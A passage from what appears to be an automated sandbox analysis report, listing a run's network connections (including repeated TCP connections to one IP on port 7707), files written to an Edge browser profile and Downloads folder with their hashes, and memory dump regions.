| NL | 142.250.102.138:443 | clients2.google.com | tcp |
| NL | 45.90.13.137:7707 | tcp | |
| US | 8.8.8.8:53 | 156.74.201.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.bitcore.io | udp |
| US | 172.67.184.201:443 | api.bitcore.io | tcp |
| US | 172.67.184.201:443 | api.bitcore.io | udp |
| US | 8.8.8.8:53 | dot4net.com | udp |
| US | 172.67.213.148:443 | dot4net.com | tcp |
| US | 8.8.8.8:53 | 148.213.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.184.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns-tunnel-check.googlezip.net | udp |
| US | 8.8.8.8:53 | tunnel.googlezip.net | udp |
| US | 172.67.213.148:443 | dot4net.com | udp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| NL | 45.90.13.137:7707 | tcp | |
| US | 8.8.8.8:53 | 157.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.27.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| NL | 142.250.102.100:443 | consent.google.com | tcp |
| NL | 142.250.102.113:443 | consent.google.com | tcp |
| US | 8.8.8.8:53 | 100.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn3.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn1.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn2.gstatic.com | udp |
| NL | 142.250.27.101:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 142.250.27.101:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 142.250.27.101:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 142.250.27.101:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 142.250.27.101:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 142.250.27.101:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | 101.27.250.142.in-addr.arpa | udp |
| NL | 142.250.27.105:443 | www.google.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| NL | 142.250.102.95:443 | content-autofill.googleapis.com | tcp |
| NL | 142.250.102.95:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 95.102.250.142.in-addr.arpa | udp |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 142.250.27.105:443 | www.google.com | udp |
| NL | 142.250.27.105:443 | www.google.com | udp |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
| NL | 45.90.13.137:7707 | tcp | |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| GB | 92.123.26.217:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 217.26.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.211.222.173.in-addr.arpa | udp |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e765f3d75e6b0e4a7119c8b14d47d8da |
| SHA1 | cc9f7c7826c2e1a129e7d98884926076c3714fc0 |
| SHA256 | 986443556d3878258b710d9d9efbf4f25f0d764c3f83dc54217f2b12a6eccd89 |
| SHA512 | a1872a849f27da78ebe9adb9beb260cb49ed5f4ca2d403f23379112bdfcd2482446a6708188100496e45db1517cdb43aba8bb93a75e605713c3f97cd716b1079 |
\??\pipe\LOCAL\crashpad_4940_MREFXYTZMBVUSXLI
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 53bc70ecb115bdbabe67620c416fe9b3 |
| SHA1 | af66ec51a13a59639eaf54d62ff3b4f092bb2fc1 |
| SHA256 | b36cad5c1f7bc7d07c7eaa2f3cad2959ddb5447d4d3adcb46eb6a99808e22771 |
| SHA512 | cad44933b94e17908c0eb8ac5feeb53d03a7720d97e7ccc8724a1ed3021a5bece09e1f9f3cec56ce0739176ebbbeb20729e650f8bca04e5060c986b75d8e4921 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 12564c446325a17c9f4d195cb176146e |
| SHA1 | dcb643a616aa12724b29a910b0dbc7a937b9333a |
| SHA256 | 5d621cf18d99d487dc1fbd7ee9b91da3fc1151153036000afbed89eb0205b14f |
| SHA512 | 1f3ef727bcd1e9075d97d0a17a3b051482e31de206b2f333d0d99659dda7bf6d854c1711976adc1c3ad6b6ef71ea9c303031e3dd06f7a3c2c87fe1b08326f39e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 65fe18d2fb0f29aed1fa33ae94a7c137 |
| SHA1 | fa02beeab5c606a16148fe400d986ad4f2c45312 |
| SHA256 | cb08b6e6c82aab638d6c9179c53d2db3d86e540f2600929156c690d621b67f02 |
| SHA512 | b0ad87accf6541afe4bd8d0b30afa455d57226be10a459bf1c9fa21403d92c741121fa5fe84e02e1b547c9af7c3ead977b8d4f3e957efafc4a6c6d06dde30e21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fea4d80d887f65267e138bd329086480 |
| SHA1 | 7f0d2c3e9a2264b69b687ed6f5b717af80e729a7 |
| SHA256 | 85a647fe95e237b57686bc52ae68c8eb0e2b6bdb598e90e7599b24e32d72a0f3 |
| SHA512 | eb34a76258e64e0526f64000275cda4198c9717171aa31ae407da7efde08deea51aa4e5b16d703888bfae93d09f4a3107d3f90e1f880727026028c4543c9cb02 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 28467265c36412e538c9fbb5bdb55b44 |
| SHA1 | d03cdf4e9681a3b81ea3324f134ee97e16c131c8 |
| SHA256 | 243911398caf8cb6193ed615101e3ea19135019840a0a81c9da137a12488742f |
| SHA512 | 57b3adbeb3c3c1e14b0f66ca43208e7fc4591dcfa20402c74f87f5d06a43bf6c5b75f7ad583a831646397efe5fa5e5df144a83f2b41a8275a1b24e073a6e05f5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 807419ca9a4734feaf8d8563a003b048 |
| SHA1 | a723c7d60a65886ffa068711f1e900ccc85922a6 |
| SHA256 | aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631 |
| SHA512 | f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe582e00.TMP
| MD5 | 1449bd155fbc00314180af8c1fcda2c9 |
| SHA1 | d57eef0502a0b0906402cf94fdb24d54339d9ee7 |
| SHA256 | 9e4a8c7c05cf50cdbff95083f083c90c84e4f0a934e7660e0dec613e912ca1d5 |
| SHA512 | 0cce5db91098ca8c05efd3ec1224873f4ddb057902c8d06027ea6670216214b1deb1c608b8dd3f09ae716842cb44bbd9173b0832780b516a4b32c539d5020732 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | a124391e0de24a3337c1f9b11e15de82 |
| SHA1 | cb0773eb56f8697335c57881fd3ce85e804117bc |
| SHA256 | a764596d68c63a3c7ca266ed0d437a18fe2818436da0428ead9ff165e024a360 |
| SHA512 | dba3184eabe6d1b79bb8af96119904c2c2179ddeb3659f212914b93639b1e0a598a01892ff8d514db19147c3308c1e45dc1d40f5b87e2fa8e4018db457bbf9f0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | e1316d4a78e5f6999a7695568287570e |
| SHA1 | 2103aa970b6adcd93700017491efde75960cee37 |
| SHA256 | 8fc1f56befb0e1655ac31106c89745813cf6c5d1686b0c0463d93632ac8fdb9f |
| SHA512 | 4626636732734b8720f7813ac4cf444f64ef1f48af69256650c46ec975cc50ad76f831c71aaf0afb0f198deb3964345433bea09f15e66fc76ca96420325df2d8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe583b3f.TMP
| MD5 | c2a8ab32f73b8ee18e59113f6b2df4a9 |
| SHA1 | 24445755114f2e44a6b74dc216ba9b1655dbba33 |
| SHA256 | b0cd0dbcf48e5d9df941c9cd0e6956847ce857a3f42cf072c3fe535556aaf53b |
| SHA512 | ce8b0e5a3957f2e693f31d343932abdfc7c4100ea5dc503ec6bb700727f56c22a6c4c368ff11efb72bc1e66676400e079f42ad8cfa3ae9526056c595de6e5eea |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e7b316e5fdc47f33876245d8e232dc2d |
| SHA1 | bcd0604245d36f6937fd390e6d6a7f5f89a588f6 |
| SHA256 | aee704b19d918d5a01adc00f0e283a6cc0691d52384b904bc64155068b0aa0c1 |
| SHA512 | a855702450ecf22470c87c561f3360a9849d04c842c4e79eb3f3adc479737dd4f37ee7eaca549bb42bf366b8b8309e111c994003c142737ff3315466d84a577c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000032
| MD5 | 950eca48e414acbe2c3b5d046dcb8521 |
| SHA1 | 1731f264e979f18cdf08c405c7b7d32789a6fb59 |
| SHA256 | c0bbe530abfce19e06697bc4358eb426e076ccdb9113e22df4a6f32085da67a2 |
| SHA512 | 27e55525ade4d099a6881011f6e2e0d5d3a9ca7181f4f014dc231d40b3b1907d0d437b0c44d336c25dd7b73209cd773b8563675ac260c43c7752e2d2d694d4d9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | cb73c10ea36813d5094b99cd9f74588a |
| SHA1 | d3ef83631a2a14939f1998ac202f1453524c1c02 |
| SHA256 | cb38ffa2befbaf646c184a0aa9937a38b0a6efe4cf3b228958051d34d01dd7e1 |
| SHA512 | 262fcb7772b2b4e3bfe5e36570517c9ff4d79c18693f32d4623e83a21dc3c2dd120708c56b5009eea1cb25472876d705199d590b01567ce289d1561be752ebb9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d2724410b5851199c545771e92e7b1d6 |
| SHA1 | 0aafc177434f0808408a6c94efa322c18bc12b27 |
| SHA256 | 020064884216b312cd218d9012fbf040c558f71509e00aca9b7a5e210f4c2379 |
| SHA512 | bcb0ae046ad8ca2300d359a9a27316e24573708687536339e06937645319d838de93312aeb5a050cb88fc11f4f8090ca713f1552e50ad52a0fcc4671e395dba5 |
C:\Users\Public\Desktop\Acrobat Reader DC.lnk
| MD5 | 1b99e9c0b18a8ff11628c78ae7ec8b22 |
| SHA1 | 1c7498935760542ffb55042b1107b187366ab867 |
| SHA256 | 16a6a0ee84ea6ec319455a8cbdc0a07d9cc6611e82990f9409693540e33e4cb2 |
| SHA512 | 4971dc65ef122cfe0f2f692bc9e51a1155528b54de464a70803166e55e3c36901615e8d56a73a7628f5ad2e805c0f352a93ff6a8bbd86ff4a9f06573a8f994c8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 50f92b2a8e7df355d21571215f06adab |
| SHA1 | d600210ba968c31d0c9c92fd0cc2b35bf2809a23 |
| SHA256 | dd60f17b87070762bdd158f028ae4ec7cfb6acf2d71542877c7d56eb4427d5c9 |
| SHA512 | 356e1117cde07f6939b258814de44d93f89eb33667a5d0dd55ccba7e4821acc1567b4166e82550284b9e58f3ce37584fbe05c7b89776d7bdaee2ac57a67a8781 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000025
| MD5 | 76a3f1e9a452564e0f8dce6c0ee111e8 |
| SHA1 | 11c3d925cbc1a52d53584fd8606f8f713aa59114 |
| SHA256 | 381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c |
| SHA512 | a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024
| MD5 | 5b6eb9202abfde97e3d691a835509902 |
| SHA1 | 515f8ea6e88d5bde68808f1d14e3571bc04d94e7 |
| SHA256 | f9ab282aea02569f9e73aba576cd517a7fefba7d90b935fc571397e710b15dab |
| SHA512 | 309f32e918aefdb51c218d57ac37714d90653dbcc4317597c1e3df67a8375b5cd7aed9dec97eeae248b29c03bb46318216a3384971357bfb4dfbc294e7f5f9e3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000023
| MD5 | 1d9097f6fd8365c7ed19f621246587eb |
| SHA1 | 937676f80fd908adc63adb3deb7d0bf4b64ad30e |
| SHA256 | a9dc0d556e1592de2aeef8eed47d099481cfb7f37ea3bf1736df764704f39ddf |
| SHA512 | 251bf8a2baf71cde89873b26ee77fe89586daf2a2a913bd8383b1b4eca391fdd28aea6396de3fdff029c6d188bf9bb5f169954e5445da2933664e70acd79f4e3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000022
| MD5 | c3c0eb5e044497577bec91b5970f6d30 |
| SHA1 | d833f81cf21f68d43ba64a6c28892945adc317a6 |
| SHA256 | eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb |
| SHA512 | 83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000027
| MD5 | b38fbbd0b5c8e8b4452b33d6f85df7dc |
| SHA1 | 386ba241790252df01a6a028b3238de2f995a559 |
| SHA256 | b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd |
| SHA512 | 546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000026
| MD5 | 710d7637cc7e21b62fd3efe6aba1fd27 |
| SHA1 | 8645d6b137064c7b38e10c736724e17787db6cf3 |
| SHA256 | c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b |
| SHA512 | 19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000028
| MD5 | 74c0a9aceda2547c4b5554c0425b17ba |
| SHA1 | d5d2355e5919dcf704192787f4b2fbb63b649b0f |
| SHA256 | 3b9e3adb939801b9ada1ce67afc7decef4538c016c78113697b89a35a295dd8d |
| SHA512 | e178dce4a59cf184bcca3523e687092f4edc2a3c7af4eddf1ca1965ca06347eadf8901f851260264c14fa052331b2d1aeef2a6b9048b87758617285c9650b479 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8588b1756e9edd053db586bfd4ef5f42 |
| SHA1 | eec481b51315700e39540eb1395b837610b10d7e |
| SHA256 | 801e7fb92bcc9e3b745d53981b72efdcd3665ae36090bbc98de6f4ff14779e0c |
| SHA512 | 266afe4e2a65e501f278c5154125d2a583cece11075eea0fd049593a1dabb8efa12157450b121d4c91afcc983ce5891016a899490b041e1936c36896888732ff |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 246d8d0fa2fe4d1a7e916d75cad43216 |
| SHA1 | 37bb4f08e43a9fd0238fc630f80b223c6626ebe7 |
| SHA256 | 774209a1511fd333f91e885b23039d7fc4615bbf280bd60bd561a6a07f482728 |
| SHA512 | 6879e8028b0b7152e6d99a4282bae34fe854bf70ba3d84d33d2bdaab8c257284c35d96cb43d2b41e170fbf2f7d78443086017933e8e714cfd3147dd7b9f2b2e4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | bc104f08c6446118a42e26fb19816c50 |
| SHA1 | 071c5a005d2b10fee347b2a3c9ffccfabcd2f79d |
| SHA256 | 11a685f805d68babf9030cba5af2accd6cf9f80ed60ea0823e500669b6fdf917 |
| SHA512 | 18b97b7e43d99cf96a5e51da1f560f3e912caaf3d6313dbcc1710bd09f16f1544ce6bff062b994fce06cfc0ea02c1c2fcc61518834688ff5f8b3fbc280bca500 |
C:\Users\Admin\Downloads\758f6fa8-6e15-4971-81fa-b3a021965bab.tmp
| MD5 | e233dd91baf27f08921bd3530d12414e |
| SHA1 | 900e1e4ab2fa769f6b8991338796d58110f1b89c |
| SHA256 | a35661e2cd35cd20cc6aaecb884d702c815ab6ad28311b7608c31cea5ac0b983 |
| SHA512 | f4e1641a3a8d19645b9be686765218a1681e1ad75506a3797ddbfae4b9858e3944ba402db480c2cf7bdf68884c13cc8711a497aeafaa57df614ae1e0d6ccc530 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\979caeb6-6fd6-4abb-a45f-6a489dab9da2.tmp
| MD5 | 886794a3e73ffd9f54258ba530dcaf67 |
| SHA1 | f8e0d2dceb4191be93f19f95e17e07e554f60c66 |
| SHA256 | c3ca1f3d8248065e69ea9257db74b2e846d173307a202827e5852b91cb01bc0f |
| SHA512 | 8ba0c6e2e336ac67dab71e8a7c6189c1eef568ee07a10f057ec6d20ab7f29f5ccff056c2334a188ac52657d1bf903d628653cb84304ba9204fa6a1f262e9ad58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000036
| MD5 | d91bac1b60b58c54f87f1d1b7b16d445 |
| SHA1 | 9ed78d3cf7553e3180bcbcd2ea9779e1e1a141e1 |
| SHA256 | 4dd5f57067798bd3132643930620ccde1e4140289d52fcbc4fcf7b252876fe8f |
| SHA512 | eb474a57cce34e17d00972b927846f087c55a76f5fc1fdbea0e43111f9d9a5af848862984431402a6a043e5a1a96815be84e114fc03c0372a03285fcf0c2623c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000035
| MD5 | 5d0e354e98734f75eee79829eb7b9039 |
| SHA1 | 86ffc126d8b7473568a4bb04d49021959a892b3a |
| SHA256 | 1cf8ae1c13406a2b4fc81dae6e30f6ea6a8a72566222d2ffe9e85b7e3676b97e |
| SHA512 | 4475f576a2cdaac1ebdec9e0a94f3098e2bc84b9a2a1da004c67e73597dd61acfbb88c94d0d39a655732c77565b7cc06880c78a97307cb3aac5abf16dd14ec79 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000037
| MD5 | 5ee74d2f4e6ea0f4d1f7400ff14d8ed3 |
| SHA1 | 9951232bfd4bf98399ba2d2afa462e8330abeb85 |
| SHA256 | a71683af7a6c0920259ae7bba878f706f350ee6621b2e93c5cfee7cdd0c6ab49 |
| SHA512 | 7fe33c2da8658acfecd676cf1501d745802556638bad6b5eafc279f9cfd2a27b3b0abd9e3911c36365baf5f842c6194c0fd31f0d4ce3950e8aa92c42abb529e4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 1727f6121993ac8257f963ee2800e12a |
| SHA1 | a1b40bd1d1b2c699d2ce108c0d8e15936ea70a40 |
| SHA256 | 5fb8b246f2120acea0af300d1cefcf7e01a843c1ca9c743f7099d5dabfe8b7f2 |
| SHA512 | ce12598eb37cdd91579d31dd0aa98b08c4bee9a894d2218b46c29506dca07229f503f810a078decd75405c9ca5160e36aba7fda44c4854572f57ec396e02d1a3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000054
| MD5 | fa0e80178ceb7aedb057c26747d13bb0 |
| SHA1 | 0adcfada05cdcf56dda3960d251920f62eb9a0d2 |
| SHA256 | dd11477a42da0195ccee960fe845fc8a1673967dbeae8d3827b6073ea2fd5554 |
| SHA512 | 1cae8f364b2e8b44ab2ba872474dcee570e4d251591cd1ad5286aed89b57ef8ed6bdf57f510df3e5e8763d9ea08dd11b8602565b47e1ce3587a452c156be8ecb |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | b89c4cdbc30883df3ce0ef3535fe84b9 |
| SHA1 | 1a9572c8ab85063a2a324b5a8a3e701a628476f6 |
| SHA256 | d0a9119d4c8cad728847a95d9e73756edcf4e332bebda9e5ad0c1d92c10c1fdd |
| SHA512 | 215e5aea3e1d03c357d709dbea34e5f777d9393c3f20f7d4ddeb9bd49925b9be2c018ec9567f0efe975557ec580a17c69f5e26c4f779cddeae6e07ca7d9ca397 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000014
| MD5 | aab2532f8363e63359dbf0c31981f57f |
| SHA1 | a21523eb85636a0455977ffe525260a1a8568043 |
| SHA256 | a6abef5f074c67b1f9fbee679151a4c705b71f054c98f720dfabdc65786d5d13 |
| SHA512 | 7b3c4ce6574b36bf0d4e05bba1063798b525744fdb37b28ad6fc78456ef7d704677795ae4dd0d0eda0954d15b3776395fa931abf82dd4b64583c360dd9916f64 |
C:\Users\Admin\Downloads\6c3806eb-ad96-459d-b5e6-ef23d270fa6c.tmp
| MD5 | e9818905f852140640a32d0eacbe8c68 |
| SHA1 | 7560e97420e5be4c462b6154c5e1151bf692994e |
| SHA256 | 69ff2ce6bb13f20009899ca93a12cba436d58cbf98e5e01a76def4e584fb68c7 |
| SHA512 | 46acbefd0de231c7996c0294c1e473921fcbba99c41c4daeadd4bd881558d050a230c113f2be2e0840c83f422a49fd42b33a915bcf98ae39d070d0d7a3c106ea |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b028b5ef8bdfda4253133b5f5210028c |
| SHA1 | e22d53241f8e7566e479a271e6d3f6ab3819a867 |
| SHA256 | 488b76ef0c08f6f58b270e98e4eb094072c04747e447aea505df84a80b8a0a06 |
| SHA512 | ccac42c0f9463a70ad706abb229591b47c841c394573825a73262f7342c43b5184ce597c1513e6cdcfa43f96452deb349a71412e0da6329e6f81add964b5407e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | cc58a359cd6d2c6bab80f4f8e24569b1 |
| SHA1 | 4f3f866592427ac81aa77260432799ce206cb7c4 |
| SHA256 | f2a6a7f5fe956820b21ce1b68e6af5d3ed5dd4f8f4a168a2162b873fd61464d3 |
| SHA512 | 7aa2bd2679aad0addf414b1bf7bd4fde143661fb555e45e2ee1ad23b7c592e9008bb9f20347793968ac87e099d1e615019ff18b49bbccdcdcebc19b600939a6c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 3b470252f728fcede25eeff04becdb8e |
| SHA1 | 00353db03fbc3a04bd1a3709e90d6690c5e556a8 |
| SHA256 | 206983ad4222c0e836244bdc575bcaaeee5b743ec0357a6493a924af6a43ff6c |
| SHA512 | eaeb65e3913932fe1d77508ae37da361f952cab6f244a3310159cd437bf80c10ccd14bd55ff45391af26be2c6d70c2cffd434e3ae8623d74802512913d21a87b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 8cc06f38353754b5d009f8806323c58b |
| SHA1 | 69b1f759873c12e5e7ca7076b8cfe771fea17b4d |
| SHA256 | aa69d997ae6d94abbb3e499423c386fc779665455b51c1cbf6e934c1cec1d8b0 |
| SHA512 | f9205d00c44c227032147e776fa7884dee0c06490f92bac3742f31b8cb10e2a952a6919a41a236838b78fc57ee740399fd9428a41610b63c5c5dd074067751dc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 2d37ce805f46cfd93b1e95587b736e8e |
| SHA1 | 0e0f349c2f32d79a854234d1c77158578de5fde6 |
| SHA256 | 06ddd7f03ac46d38890170f3f520d0e08c94541ee773e90a7676882c29a62555 |
| SHA512 | 097c5be76605a6b5db026f0f19211ede05ca21f1d1f3866390e63ec9fa08c303e3edbbd6a39236c19ad9fb1880abe8b31946ba94c0277b5db017741fbf24bb1c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 69dc60e68f498391da72688df63212eb |
| SHA1 | 1cb9e995a09fc7a61c6e46f038bda25a73c22db0 |
| SHA256 | 25b7192fe5f7a5cf0cf41259e18eea652babd2c5467c3059969f3550b999987c |
| SHA512 | 4fa307d128878cd7fdfa4f7f44937d24eef7ade3c7f8422f0628f31d73f6ad8ec1beafc30ef850a07f2bbd1114bf643f5bfe8f221bb3d94cbe52d2fd7a151a96 |
memory/4928-1332-0x0000022BB3460000-0x0000022BB3470000-memory.dmp
memory/4928-1328-0x0000022BB2BB0000-0x0000022BB2BC0000-memory.dmp
memory/4928-1339-0x0000022BBB740000-0x0000022BBB741000-memory.dmp
memory/4928-1341-0x0000022BBB7C0000-0x0000022BBB7C1000-memory.dmp
memory/4928-1345-0x0000022BBB850000-0x0000022BBB851000-memory.dmp
memory/4928-1344-0x0000022BBB850000-0x0000022BBB851000-memory.dmp
memory/4928-1343-0x0000022BBB7C0000-0x0000022BBB7C1000-memory.dmp
memory/4928-1346-0x0000022BBB860000-0x0000022BBB861000-memory.dmp
memory/4928-1347-0x0000022BBB860000-0x0000022BBB861000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 7ebf9ee18fce3b87b760bd2b568b6db7 |
| SHA1 | 1e0473076dfcbc461ae462ac3997dd899cdd2086 |
| SHA256 | 6356cb4c030656505734e0394a3794efa1122d27f05dc05b46452516925847f3 |
